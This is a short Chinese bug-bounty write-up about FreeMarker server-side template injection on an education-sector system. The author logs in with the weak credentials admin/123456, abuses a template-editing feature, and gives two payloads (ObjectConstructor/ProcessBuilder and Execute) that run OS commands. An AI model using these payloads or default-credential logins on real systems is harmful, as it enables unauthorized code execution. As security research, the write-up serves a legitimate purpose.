edusrc—freemarker模板注入RCE
免责声明:
由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
freemarker 简述
FreeMarker 是一款 模板引擎: 即一种基于模板和要改变的数据, 并用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)的通用工具。 它不是面向最终用户的,而是一个Java类库,是一款程序员可以嵌入他们所开发产品的组件
信息收集
开局一个登入框弱口令admin/123456登入管理员
来到系统设置,发现有个模版维护
只要创建保存点击发布就会报错500
ps:报错的图忘截图了,大概是这样子的但是发现里面有freemarker字眼的,而且页面中正好有模版功能,想到freemarker模版是有漏洞的
漏洞利用
freemarker模板注入文章:
https://www.cnblogs.com/nice0e3/p/16217471.html
2个poc一起使用
<#assign value="freemarker.template.utility.ObjectConstructor"new()>${value("java.lang.ProcessBuilder","whoami").start()}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("whomai") }
命令执行成功
浙公网安备 33010602011771号